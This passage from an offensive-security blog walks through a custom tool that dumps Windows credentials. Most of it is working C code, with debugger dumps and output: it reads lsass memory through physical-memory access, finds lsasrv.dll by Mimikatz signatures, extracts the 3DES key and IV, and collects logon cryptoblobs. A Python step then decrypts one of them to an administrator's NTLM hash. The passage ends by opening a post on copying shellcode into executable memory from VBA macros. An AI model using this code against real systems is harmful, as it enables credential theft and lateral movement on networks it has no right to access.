ffffa48b`b01472c0  00000003`000003a0 00000000`00000000
ffffa48b`b01472d0  00000000`04000000 ffffa48b`b014daa0
ffffa48b`b01472e0  ffffd100`10b56f40 ffffd100`10b56fc8
ffffa48b`b01472f0  ffffa48b`b014da28 ffffa48b`b014da28
ffffa48b`b0147300  ffffa48b`b016e081 00007ff6`43aa5002

The first thing we can see is the pointer to the left node (offset 0x00-0x07) and the pointer to the right node (0x08-0x10). We have to add them to a queue and check them later, and add their respective new children nodes, repeating this operation in order to walk the whole tree. Also combining 4 bytes from 0x18 and 1 byte from 0x20 we get the starting address of the described memory region (the ending virtual address is obtained combining 4 bytes from 0x1c and 1 byte from 0x21). So we can walk the whole tree doing something like:

//(...)
	currentNode = queue[cursor]; // Current Node, at start it is the VadRoot pointer
        if (currentNode == 0) {
            cursor++;
            continue;
        }

        reader.QuadPart = v2p(currentNode); // Get Physical Address
        left = readPhysMemPointer(reader); //Read 8 bytes and save it as "left" node
        queue[last++] = left; //Add the new node
        //printf("[<] Left: 0x%08llx\n", left);

        reader.QuadPart = v2p(currentNode + 0x8); // Get Physical Address of right node
        right = readPhysMemPointer(reader); //Save the pointer
        queue[last++] = right; //Add the new node
        //printf("[>] Right: 0x%08llx\n", right);
  



        // Get the start address
        reader.QuadPart = v2p(currentNode + 0x18);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &startingVpn, 4, &bytes_read, NULL);
        reader.QuadPart = v2p(currentNode + 0x20);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &startingVpnHigh, 1, &bytes_read, NULL);
        start = (startingVpn << 12) | (startingVpnHigh << 44);

        // Get the end address
        reader.QuadPart = v2p(currentNode + 0x1c);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &endingVpn, 4, &bytes_read, NULL);
        reader.QuadPart = v2p(currentNode + 0x21);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &endingVpnHigh, 1, &bytes_read, NULL);
        end = (((endingVpn + 1) << 12) | (endingVpnHigh << 44));
//(...)

Now we can retrieve all the regions of virtual memory reserved, and the limits (starting address and ending address, and by substraction the size):

[+] Starting to walk _RTL_AVL_TREE...
                ===================[VAD info]===================
[0] (0xffffa48bb0147290) [0x7ff643aa0000-0x7ff643ab2000] (73728 bytes)
[1] (0xffffa48bb0146c50) [0x1d4d2ef0000-0x1d4d2f0d000] (118784 bytes)
[2] (0xffffa48bb01493b0) [0x7ff845000000-0x7ff845027000] (159744 bytes)
[3] (0xffffa48bb0179300) [0x80cbf00000-0x80cbf80000] (524288 bytes)
[4] (0xffffa48bb01795d0) [0x1d4d36a0000-0x1d4d36a1000] (4096 bytes)
[5] (0xffffa48bb01a1390) [0x7ff844540000-0x7ff84454c000] (49152 bytes)

But VADs contain other interesting metadata. For example, if the region is reserved for an image file, we can retrieve the path of that file. This is important for us because we want to locate the loaded lsasrv.dll inside the lsass process because from here is where we are going to loot credentials (imitating the Mimikatz’s sekurlsa::msv to get NTLM hashes).

Let’s take a ride through the __mmvad struct (follow the arrows!):

lkd> dt nt!_mmvad 0xffffe786`ed185cf0
   +0x000 Core             : _MMVAD_SHORT
   +0x040 u2               : <anonymous-tag>
   +0x048 Subsection       : 0xffffe786`ed185d60 _SUBSECTION <===========
   +0x050 FirstPrototypePte : (null)
   +0x058 LastContiguousPte : 0x00000002`00000006 _MMPTE
   +0x060 ViewLinks        : _LIST_ENTRY [ 0x00000006`00000029 - 0x00000000`00000000 ]
   +0x070 VadsProcess      : 0xffffe786`ed185c70 _EPROCESS
   +0x078 u4               : <anonymous-tag>
   +0x080 FileObject       : 0xffffe786`ed185d98 _FILE_OBJECT



kd> dt nt!_SUBSECTION 0xffffe786`ed185d60
   +0x000 ControlArea      : 0xffffe786`ed185c70 _CONTROL_AREA <==============================
   +0x008 SubsectionBase   : 0xffffae0e`cab53f58 _MMPTE
   +0x010 NextSubsection   : 0xffffe786`ed185d98 _SUBSECTION
   +0x018 GlobalPerSessionHead : _RTL_AVL_TREE
   +0x018 CreationWaitList : (null)
   +0x018 SessionDriverProtos : (null)
   +0x020 u                : <anonymous-tag>
   +0x024 StartingSector   : 0x2b
   +0x028 NumberOfFullSectors : 0x2c
   +0x02c PtesInSubsection : 6
   +0x030 u1               : <anonymous-tag>
   +0x034 UnusedPtes       : 0y000000000000000000000000000000 (0)
   +0x034 ExtentQueryNeeded : 0y0
   +0x034 DirtyPages       : 0y0



lkd> dt nt!_CONTROL_AREA  0xffffe786`ed185c70
   +0x000 Segment          : 0xffffae0e`ce0c9f50 _SEGMENT
   +0x008 ListHead         : _LIST_ENTRY [ 0xffffe786`ed1b1210 - 0xffffe786`ed1b1210 ]
   +0x008 AweContext       : 0xffffe786`ed1b1210 Void
   +0x018 NumberOfSectionReferences : 1
   +0x020 NumberOfPfnReferences : 0xf
   +0x028 NumberOfMappedViews : 1
   +0x030 NumberOfUserReferences : 2
   +0x038 u                : <anonymous-tag>
   +0x03c u1               : <anonymous-tag>
   +0x040 FilePointer      : _EX_FAST_REF <=================
   +0x048 ControlAreaLock  : 0n0
   +0x04c ModifiedWriteCount : 0
   +0x050 WaitList         : (null)
   +0x058 u2               : <anonymous-tag>
   +0x068 FileObjectLock   : _EX_PUSH_LOCK
   +0x070 LockedPages      : 1
   +0x078 u3               : <anonymous-tag>

So at 0xffffe786ed185c70 plus 0x40 we have a field called FilePointer and it is an EX_FAST_REF. In order to retrieve the correct pointer, we have to retrieve the pointer from this position and turn to zero the last digit:

lkd> dt nt!_EX_FAST_REF 0xffffe786`ed185c70+0x40
   +0x000 Object           : 0xffffe786`ed19539c Void <=========================== & 0xfffffffffffffff0
   +0x000 RefCnt           : 0y1100
   +0x000 Value            : 0xffffe786`ed19539c

So 0xffffe786ed19539c & 0xfffffffffffffff0 is 0xffffe786ed195390, which is a pointer to a _FILE_OBJECT struct:

lkd> dt nt!_FILE_OBJECT 0xffffe786`ed195390
   +0x000 Type             : 0n5
   +0x002 Size             : 0n216
   +0x008 DeviceObject     : 0xffffe786`e789c060 _DEVICE_OBJECT
   +0x010 Vpb              : 0xffffe786`e77df4c0 _VPB
   +0x018 FsContext        : 0xffffae0e`cd2c8170 Void
   +0x020 FsContext2       : 0xffffae0e`cd2c83e0 Void
   +0x028 SectionObjectPointer : 0xffffe786`ed18e7f8 _SECTION_OBJECT_POINTERS
   +0x030 PrivateCacheMap  : (null)
   +0x038 FinalStatus      : 0n0
   +0x040 RelatedFileObject : (null)
   +0x048 LockOperation    : 0 ''
   +0x049 DeletePending    : 0 ''
   +0x04a ReadAccess       : 0x1 ''
   +0x04b WriteAccess      : 0 ''
   +0x04c DeleteAccess     : 0 ''
   +0x04d SharedRead       : 0x1 ''
   +0x04e SharedWrite      : 0 ''
   +0x04f SharedDelete     : 0x1 ''
   +0x050 Flags            : 0x44042
   +0x058 FileName         : _UNICODE_STRING "\Windows\System32\lsass.exe"  <======== /!\
   +0x068 CurrentByteOffset : _LARGE_INTEGER 0x0
   +0x070 Waiters          : 0
   +0x074 Busy             : 0
   +0x078 LastLock         : (null)
   +0x080 Lock             : _KEVENT
   +0x098 Event            : _KEVENT
   +0x0b0 CompletionContext : (null)
   +0x0b8 IrpListLock      : 0
   +0x0c0 IrpList          : _LIST_ENTRY [ 0xffffe786`ed195450 - 0xffffe786`ed195450 ]
   +0x0d0 FileObjectExtension : (null)

Finally! At offset 0x58 is an _UNICODE_STRING struct that contains the path to the image asociated with this memory region. In order to get this info, we need to parse each node found and get deep in this rollercoaster of structs, reading each pointer from the target offset. So… finally we are going to have something like:

void walkAVL(ULONGLONG VadRoot, ULONGLONG VadCount) {

    /* Variables used to walk the AVL tree*/
    ULONGLONG* queue;
    BOOL result;
    DWORD bytes_read = 0;
    LARGE_INTEGER reader;
    ULONGLONG cursor = 0;
    ULONGLONG count = 1;
    ULONGLONG last = 1;

    ULONGLONG startingVpn = 0;
    ULONGLONG endingVpn = 0;
    ULONGLONG startingVpnHigh = 0;
    ULONGLONG endingVpnHigh = 0;
    ULONGLONG start = 0;
    ULONGLONG end = 0;

    VAD* vadList = NULL;



    printf("[+] Starting to walk _RTL_AVL_TREE...\n");
    queue = (ULONGLONG *)malloc(sizeof(ULONGLONG) * VadCount * 4); // Make room for our queue
    queue[0] = VadRoot; // Node 0

    vadList = (VAD*)malloc(VadCount * sizeof(*vadList)); // Save all the VADs in an array. We do not really need it (because we can just break when the lsasrv.dll is found) but hey... maybe we want to reuse this code in the future

    while (count <= VadCount) {
        ULONGLONG currentNode;
        ULONGLONG left = 0;
        ULONGLONG right = 0;
        ULONGLONG subsection = 0;
        ULONGLONG control_area = 0;
        ULONGLONG filepointer = 0;
        ULONGLONG fileobject = 0;
        ULONGLONG filename = 0;
        USHORT pathLen = 0;
        LPWSTR path = NULL;
        

        // printf("Cursor [%lld]\n", cursor);
        currentNode = queue[cursor]; // Current Node, at start it is the VadRoot pointer
        if (currentNode == 0) {
            cursor++;
            continue;
        }

        reader.QuadPart = v2p(currentNode); // Get Physical Address
        left = readPhysMemPointer(reader); //Read 8 bytes and save it as "left" node
        queue[last++] = left; //Add the new node
        //printf("[<] Left: 0x%08llx\n", left);

        reader.QuadPart = v2p(currentNode + 0x8); // Get Physical Address of right node
        right = readPhysMemPointer(reader); //Save the pointer
        queue[last++] = right; //Add the new node
        //printf("[>] Right: 0x%08llx\n", right);
  



        // Get the start address
        reader.QuadPart = v2p(currentNode + 0x18);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &startingVpn, 4, &bytes_read, NULL);
        reader.QuadPart = v2p(currentNode + 0x20);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &startingVpnHigh, 1, &bytes_read, NULL);
        start = (startingVpn << 12) | (startingVpnHigh << 44);

        // Get the end address
        reader.QuadPart = v2p(currentNode + 0x1c);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &endingVpn, 4, &bytes_read, NULL);
        reader.QuadPart = v2p(currentNode + 0x21);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &endingVpnHigh, 1, &bytes_read, NULL);
        end = (((endingVpn + 1) << 12) | (endingVpnHigh << 44));

        //Get the pointer to Subsection (offset 0x48 of __mmvad)
        reader.QuadPart = v2p(currentNode + 0x48);
        subsection = readPhysMemPointer(reader); 
        
        if (subsection != 0 && subsection != 0xffffffffffffffff) {

            //Get the pointer to ControlArea (offset 0 of _SUBSECTION)
            reader.QuadPart = v2p(subsection);
            control_area = readPhysMemPointer(reader); 

            if (control_area != 0 && control_area != 0xffffffffffffffff) {

                //Get the pointer to FileObject (offset 0x40 of _CONTROL_AREA)
                reader.QuadPart = v2p(control_area + 0x40);
                fileobject = readPhysMemPointer(reader);
                if (fileobject != 0 && fileobject != 0xffffffffffffffff) {
                    // It is an _EX_FAST_REF, so we need to mask the last byte
                    fileobject = fileobject & 0xfffffffffffffff0;

                    //Get the pointer to path length (offset 0x58 of _FILE_OBJECT is _UNICODE_STRING, the len plus null bytes is at +0x2)
                    reader.QuadPart = v2p(fileobject + 0x58 + 0x2);
                    result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
                    result = ReadFile(pmem_fd, &pathLen, 2, &bytes_read, NULL);

                    //Get the pointer to the path name (offset 0x58 of _FILE_OBJECT is _UNICODE_STRING, the pointer to the buffer is +0x08)
                    reader.QuadPart = v2p(fileobject + 0x58 + 0x8);
                    filename = readPhysMemPointer(reader);

                    //Save the path name
                    path = (LPWSTR)malloc(pathLen * sizeof(wchar_t));
                    reader.QuadPart = v2p(filename);
                    result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
                    result = ReadFile(pmem_fd, path, pathLen * 2, &bytes_read, NULL);
                }
            }
        }
        /*printf("[0x%08llx]\n", currentNode);
        printf("[!] Subsection 0x%08llx\n", subsection);
        printf("[!] ControlArea 0x%08llx\n", control_area);
        printf("[!] FileObject 0x%08llx\n", fileobject);
        printf("[!] PathLen %d\n", pathLen);
        printf("[!] Buffer with path name 0x%08llx\n", filename);
        printf("[!] Path name: %S\n", path);
        */


        // Save the info in our list
        vadList[count - 1].id = count - 1;
        vadList[count - 1].vaddress = currentNode;
        vadList[count - 1].start = start;
        vadList[count - 1].end = end;
        vadList[count - 1].size = end - start;
        memset(vadList[count - 1].image, 0, MAX_PATH);
        if (path != NULL) {
            wcstombs(vadList[count - 1].image, path, MAX_PATH);
            free(path);
        } 

        count++;
        cursor++;
    }

    //Just print the VAD list
    printf("\t\t===================[VAD info]===================\n");
    for (int i = 0; i < VadCount; i++) {
        printf("[%lld] (0x%08llx) [0x%08llx-0x%08llx] (%lld bytes)\n", vadList[i].id, vadList[i].vaddress, vadList[i].start, vadList[i].end, vadList[i].size);
        if (vadList[i].image[0] != 0) {
            printf(" |\n +---->> %s\n", vadList[i].image);
        }
    }
    printf("\t\t================================================\n");


    for (int i = 0; i < VadCount; i++) {
        if (!strcmp(vadList[i].image, "\\Windows\\System32\\lsasrv.dll")) { // Is this our target?
            printf("[!] LsaSrv.dll found! [0x%08llx-0x%08llx] (%lld bytes)\n", vadList[i].start, vadList[i].end, vadList[i].size);
            // TODO lootLsaSrv(vadList[i].start, vadList[i].end, vadList[i].size);
            break;
        }
    }
    

    
    free(vadList);
    free(queue);
    return;
    
}

This looks like…

(...)
[161] (0xffffa48baf677ba0) [0x7ff8122b0000-0x7ff8122e0000] (196608 bytes)
 |
 +---->> \Windows\System32\CertPolEng.dll
[162] (0xffffa48bb1f640a0) [0x7ff8183e0000-0x7ff818422000] (270336 bytes)
 |
 +---->> \Windows\System32\ngcpopkeysrv.dll
[163] (0xffffa48bb1f63ce0) [0x7ff83df10000-0x7ff83df2a000] (106496 bytes)
 |
 +---->> \Windows\System32\tbs.dll
[164] (0xffffa48bb1f66a80) [0x7ff83e270000-0x7ff83e2e3000] (471040 bytes)
 |
 +---->> \Windows\System32\cryptngc.dll
                ================================================
[!] LsaSrv.dll found! [0x7ff845130000-0x7ff8452ce000] (1695744 bytes)

To recap at this point we:

  1. Can translate virtual addresses to physical
  2. Got the location of the LsaSrv.dll module inside the lsass process memory

Stray Mimikatz sings Runnaway Boys

This time we are only interested in retrieving NTLM hashes, so we are going to implement something like the sekurlsa::msv from Mimikatz as PoC (once we have located the process memory, and its modules, it is trivial to imitate any functionatility from Mimikatz so I picked the quickier to implement as PoC).

This is well explained in the article β€œUncovering Mimikatz β€˜msv’ and collecting credentials through PyKD” from Matteo Malvica, so it is redundant to explain it again here… but in essence we are going to search for signatures inside lsasrv.dll and then retrieve the info needed to locate the LogonSessionList struct and the crypto keys/IVs needed. Also another good related article to read is β€œExploring Mimikatz - Part 1 - WDigest” by @xpn.

As I am imitating the post from Matteo Malvica, I am going to retrieve only the cryptoblob encrypted with Triple-DES. Here is our shitty code:

void lootLsaSrv(ULONGLONG start, ULONGLONG end, ULONGLONG size) {
    LARGE_INTEGER reader;
    DWORD bytes_read = 0;
    LPSTR lsasrv = NULL;
    ULONGLONG cursor = 0;
    ULONGLONG lsasrv_size = 0;
    ULONGLONG original = 0;
    BOOL result; 
 

    ULONGLONG LogonSessionListCount = 0;
    ULONGLONG LogonSessionList = 0;
    ULONGLONG LogonSessionList_offset = 0;
    ULONGLONG LogonSessionListCount_offset = 0;
    ULONGLONG iv_offset = 0;
    ULONGLONG hDes_offset = 0;
    ULONGLONG DES_pointer = 0;

    unsigned char* iv_vector = NULL;
    unsigned char* DES_key = NULL;
    KIWI_BCRYPT_HANDLE_KEY h3DesKey;
    KIWI_BCRYPT_KEY81 extracted3DesKey;

    LSAINITIALIZE_NEEDLE LsaInitialize_needle = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x44, 0x8b, 0x4d, 0xd8, 0x48, 0x8d, 0x15 };
    LOGONSESSIONLIST_NEEDLE LogonSessionList_needle = { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 };
    
    PBYTE LsaInitialize_needle_buffer = NULL;
    PBYTE needle_buffer = NULL;

    int offset_LsaInitialize_needle = 0;
    int offset_LogonSessionList_needle = 0;

    ULONGLONG currentElem = 0;

    original = start;

    /* Save the whole region in a buffer */
    lsasrv = (LPSTR)malloc(size);
    while (start < end) {
        DWORD bytes_read = 0;
        DWORD bytes_written = 0;
        CHAR tmp = NULL;
        reader.QuadPart = v2p(start);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &tmp, 1, &bytes_read, NULL);
        lsasrv[cursor] = tmp;
        cursor++;
        start = original + cursor;
    }
    lsasrv_size = cursor;

    // Use mimikatz signatures to find the IV/keys
    printf("\t\t===================[Crypto info]===================\n");   
    LsaInitialize_needle_buffer = (PBYTE)malloc(sizeof(LSAINITIALIZE_NEEDLE));
    memcpy(LsaInitialize_needle_buffer, &LsaInitialize_needle, sizeof(LSAINITIALIZE_NEEDLE));
    offset_LsaInitialize_needle = memmem((PBYTE)lsasrv, lsasrv_size, LsaInitialize_needle_buffer, sizeof(LSAINITIALIZE_NEEDLE));
    printf("[*] Offset for InitializationVector/h3DesKey/hAesKey is %d\n", offset_LsaInitialize_needle);

    memcpy(&iv_offset, lsasrv + offset_LsaInitialize_needle + 0x43, 4);  //IV offset
    printf("[*] IV Vector relative offset: 0x%08llx\n", iv_offset);
    iv_vector = (unsigned char*)malloc(16);
    memcpy(iv_vector, lsasrv + offset_LsaInitialize_needle + 0x43 + 4 + iv_offset, 16);
    printf("\t\t[/!\\] IV Vector: ");
    for (int i = 0; i < 16; i++) {
        printf("%02x", iv_vector[i]);
    }
    printf(" [/!\\]\n");
    free(iv_vector);

    memcpy(&hDes_offset, lsasrv + offset_LsaInitialize_needle - 0x59, 4); //DES KEY offset
    printf("[*] 3DES Handle Key relative offset: 0x%08llx\n", hDes_offset);  
    reader.QuadPart = v2p(original + offset_LsaInitialize_needle - 0x59 + 4 + hDes_offset);
    DES_pointer = readPhysMemPointer(reader);
    printf("[*] 3DES Handle Key pointer: 0x%08llx\n", DES_pointer);

    reader.QuadPart = v2p(DES_pointer);
    result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
    result = ReadFile(pmem_fd, &h3DesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY), &bytes_read, NULL);
    reader.QuadPart = v2p((ULONGLONG)h3DesKey.key);
    result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
    result = ReadFile(pmem_fd, &extracted3DesKey, sizeof(KIWI_BCRYPT_KEY81), &bytes_read, NULL);

    DES_key = (unsigned char*)malloc(extracted3DesKey.hardkey.cbSecret);
    memcpy(DES_key, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret);
    printf("\t\t[/!\\] 3DES Key: ");
    for (int i = 0; i < extracted3DesKey.hardkey.cbSecret; i++) {
        printf("%02x", DES_key[i]);
    }
    printf(" [/!\\]\n");
    free(DES_key);
    printf("\t\t================================================\n");

    needle_buffer = (PBYTE)malloc(sizeof(LOGONSESSIONLIST_NEEDLE));
    memcpy(needle_buffer, &LogonSessionList_needle, sizeof(LOGONSESSIONLIST_NEEDLE));
    offset_LogonSessionList_needle = memmem((PBYTE)lsasrv, lsasrv_size, needle_buffer, sizeof(LOGONSESSIONLIST_NEEDLE));

    memcpy(&LogonSessionList_offset, lsasrv + offset_LogonSessionList_needle + 0x17, 4);
    printf("[*] LogonSessionList Relative Offset: 0x%08llx\n", LogonSessionList_offset);

    LogonSessionList = original + offset_LogonSessionList_needle + 0x17 + 4 + LogonSessionList_offset;
    printf("[*] LogonSessionList: 0x%08llx\n", LogonSessionList);

    reader.QuadPart = v2p(LogonSessionList);
    printf("\t\t===================[LogonSessionList]===================");
    while (currentElem != LogonSessionList) {
        if (currentElem == 0) {
            currentElem = LogonSessionList;
        }
        reader.QuadPart = v2p(currentElem);
        currentElem = readPhysMemPointer(reader);
        //printf("Element at: 0x%08llx\n", currentElem);
        USHORT length = 0;
        LPWSTR username = NULL;
        ULONGLONG username_pointer = 0;

        reader.QuadPart = v2p(currentElem + 0x90);  //UNICODE_STRING = USHORT LENGHT USHORT MAXLENGTH LPWSTR BUFFER
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &length, 2, &bytes_read, NULL); //Read Lenght Field
        username = (LPWSTR)malloc(length + 2);
        memset(username, 0, length + 2);
        reader.QuadPart = v2p(currentElem + 0x98);
        username_pointer = readPhysMemPointer(reader); //Read LPWSTR
        reader.QuadPart = v2p(username_pointer);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, username, length, &bytes_read, NULL); //Read string at LPWSTR
        wprintf(L"\n[+] Username: %s \n", username);
        free(username);

        ULONGLONG credentials_pointer = 0;
        reader.QuadPart = v2p(currentElem + 0x108);
        credentials_pointer = readPhysMemPointer(reader);
        if (credentials_pointer == 0) {
            printf("[+] Cryptoblob: (empty)\n");
            continue;
        }
        printf("[*] Credentials Pointer: 0x%08llx\n", credentials_pointer);

        ULONGLONG primaryCredentials_pointer = 0;
        reader.QuadPart = v2p(credentials_pointer + 0x10);
        primaryCredentials_pointer = readPhysMemPointer(reader);
        printf("[*] Primary credentials Pointer: 0x%08llx\n", primaryCredentials_pointer);

        USHORT cryptoblob_size = 0;
        reader.QuadPart = v2p(primaryCredentials_pointer + 0x18);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &cryptoblob_size, 4, &bytes_read, NULL);
        if (cryptoblob_size % 8 != 0) {
            printf("[*] Cryptoblob size: (not compatible with 3DEs, skipping...)\n");
            continue;
        }
        printf("[*] Cryptoblob size: 0x%x\n", cryptoblob_size);

        ULONGLONG cryptoblob_pointer = 0;
        reader.QuadPart = v2p(primaryCredentials_pointer + 0x20);
        cryptoblob_pointer = readPhysMemPointer(reader);
        //printf("Cryptoblob pointer: 0x%08llx\n", cryptoblob_pointer);

        unsigned char* cryptoblob = (unsigned char*)malloc(cryptoblob_size);
        reader.QuadPart = v2p(cryptoblob_pointer);
        result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, cryptoblob, cryptoblob_size, &bytes_read, NULL);
        printf("[+] Cryptoblob:\n");
        for (int i = 0; i < cryptoblob_size; i++) {
            printf("%02x", cryptoblob[i]);
        }
        printf("\n");
    }
    printf("\t\t================================================\n");
    free(needle_buffer);
    free(lsasrv);
}

If you wonder why I am not calling windows API to decrypt the info… It was 4:00 AM when we wrote this :(. Anyway, fire in the hole!

[!] LsaSrv.dll found! [0x7ff845130000-0x7ff8452ce000] (1695744 bytes)
                ===================[Crypto info]===================
[*] Offset for InitializationVector/h3DesKey/hAesKey is 305033
[*] IV Vector relative offset: 0x0013be98
                [/!\] IV Vector: d2e23014c6608529132d0f21144ee0df [/!\]
[*] 3DES Handle Key relative offset: 0x0013bf4c
[*] 3DES Handle Key pointer: 0x1d4d3610000
                [/!\] 3DES Key: 46bca8b85491846f5c7fb42700287d0437c49c15e7b76280 [/!\]
                ================================================
[*] LogonSessionList Relative Offset: 0x0012b0f1
[*] LogonSessionList: 0x7ff8452b52a0
                ===================[LogonSessionList]===================
[+] Username: Administrador
[*] Credentials Pointer: 0x1d4d3ba96c0
[*] Primary credentials Pointer: 0x1d4d3ae49f0
[*] Cryptoblob size: 0x1b0
[+] Cryptoblob:
f0e368d8302af9bbcd247687552e8207d766e674c99a61907e78a173d5e4d475df165ec1fcba3b5d3463f8bd7ce5fa6457d043147dcf26a6e03ec12d1216d57953a7f4cbdcaeec2c6a27787c332db706a5287a77957d09d546590d7f32a117f69d983290c01b1ad83cf66916ee76314c17605518a17d7ea9db2de530b1298e5178fcc638e1ae106542dcb46e37a09943dd10e3e2f15a99b93989361aa3a6e6ed8e98aab5578712bcf0f9e5a5372542f61a9032bf5d110278253c4f602107a02bf2cfe07fae7f81a4dee6440a596278e7c06eee06de5aa7f705bd6132dea0327ad869eca5da1538e098edfefcd050dd6e36a0a3196cdf5ee6786d0b62a3d526981f6c4fc503d43238887cf6f3c51cca01b912194242d7e5a76522aaf791c467ea6035a06219ea2aafc2860e6db56ddb77936871316e3f18fd9b1425f948c925171829e460cf7c31f9a0396705bcb1bfd0055b25de160cf816472180270f36e9224868d1377349f7bb001e7edfe52dbd1915a70fb686f850086732c57ba26423f7a3691ddb9b23b5f2166a56ee82d30571ffb79b222e707f6dc2cc5f986723d99229345b2d0b97371abb1573f59efecd6a

Let’s decrypt with python (yeah, we know, we are the worst :()

>>> from pyDes import *
>>> k = triple_des("46bca8b85491846f5c7fb42700287d0437c49c15e7b76280".decode("hex"), CBC, "\x00\x0d\x56\x99\x63\x93\x95\xd0")
>>> k.decrypt("f0e368d8302af9bbcd247687552e8207d766e674c99a61907e78a173d5e4d475df165ec1fcba3b5d3463f8bd7ce5fa6457d043147dcf26a6e03ec12d1216d57953a7f4cbdcaeec2c6a27787c332db706a5287a77957d09d546590d7f32a117f69d983290c01b1ad83cf66916ee76314c17605518a17d7ea9db2de530b1298e5178fcc638e1ae106542dcb46e37a09943dd10e3e2f15a99b93989361aa3a6e6ed8e98aab5578712bcf0f9e5a5372542f61a9032bf5d110278253c4f602107a02bf2cfe07fae7f81a4dee6440a596278e7c06eee06de5aa7f705bd6132dea0327ad869eca5da1538e098edfefcd050dd6e36a0a3196cdf5ee6786d0b62a3d526981f6c4fc503d43238887cf6f3c51cca01b912194242d7e5a76522aaf791c467ea6035a06219ea2aafc2860e6db56ddb77936871316e3f18fd9b1425f948c925171829e460cf7c31f9a0396705bcb1bfd0055b25de160cf816472180270f36e9224868d1377349f7bb001e7edfe52dbd1915a70fb686f850086732c57ba26423f7a3691ddb9b23b5f2166a56ee82d30571ffb79b222e707f6dc2cc5f986723d99229345b2d0b97371abb1573f59efecd6a".decode("hex"))[74:90].encode("hex")
'191d643eca7a6b94a3b6df1469ba2846'

We can check that indeed the Administrador’s NTLM hash is 191d643eca7a6b94a3b6df1469ba2846:

C:\Windows\system32>C:\Users\ortiga.japonesa\Downloads\mimikatz-master\mimikatz-master\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 May  8 2021 00:30:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # sekurlsa::msv
[!] LogonSessionListCount: 0x7ff8452b4be0
[!] LogonSessionList: 0x7ff8452b52a0
[!] Data Address: 0x1d4d3bfb5c0

Authentication Id : 0 ; 120327884 (00000000:072c0ecc)
Session           : CachedInteractive from 1
User Name         : Administrador
Domain            : ACUARIO
Logon Server      : WIN-UQ1FE7E6SES
Logon Time        : 08/05/2021 0:44:32
SID               : S-1-5-21-3039666266-3544201716-3988606543-500
        msv :
         [00000003] Primary
         * Username : Administrador
         * Domain   : ACUARIO
         * NTLM     : 191d643eca7a6b94a3b6df1469ba2846 
         * SHA1     : 5f041d6e1d3d0b3f59d85fa7ff60a14ae1a5963d
         * DPAPI    : b4772e37b9a6a10785ea20641c59e5b2

MMmm… that PtH smell…

EoF

Playing with Windows Internals and reading Mimikatz code is a nice exercise to learn and practice new things. As we said at the begin, probably this approach is not the best (our knowledge on this topic is limited), so if you spot errors/misconceptions/typos please contact us so we can fix it.

The code can be found in our repo as SnoopyOwl.

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

One thousand and one ways to copy your shellcode to memory (VBA Macros)

18 February 2021 at 00:00

Dear Fellowlship, today’s homily is about how we can (ab)use different native Windows functions to copy our shellcode to a RWX section in our VBA Macros.

Prayers at the foot of the Altar a.k.a. disclaimer

The topic is old and basic, but with the recent analysis of the Lazarus’ maldocs it feels like discussing this technique may come in handy at this moment.

Introduction

As shown by NCC in his article β€œRIFT: Analysing a Lazarus Shellcode Execution Method” Lazarus Group used maldocs where the shellcode is loaded and executed without calling any of the classical functions. To achieve it the VBA macro used UuidFromStringA to copy the shellcode to the RWX region and then triggered its execution via lpLocaleEnumProc. The lpLocaleEnumProc was previously documented by @noottrak in his article β€œAbusing native Windows functions for shellcode execution”.

Using alternatives ways to copy the shellcode is nothing new, even there are a few articles about discussing it for inter-process injections (Inserting data into other processes’ address space by @Hexacorn, GetEnvironmentVariable as an alternative to WriteProcessMemory in process injections by @TheXC3LL and Windows Process Injection: Command Line and Environment Variables by @modexpblog, just to metion a few).

Returning to @nootrak’s article we can find a list of different native functions which can be used to trigger the execution, and even a tool to build maldocs where the functions used to allocate, copy, and execute the shellcode are randomly chosen. Quoted from the article:

I’m calling trigen (think 3 combo-generator) which randomly puts together a VBA macro using API calls from pools of functions for allocating memory (4 total), copying shellcode to memory (2 total), and then finally abusing the Win32 function call to get code execution (48 total - I left SetWinEventHook out due to aforementioned need to chain functions). In total, there are 384 different possible macro combinations that it can spit out.

The tool uses only 2 native functions to copy the shellcode, when there are dozens of them that can be used. So the number of possible combinations can grow A LOT.

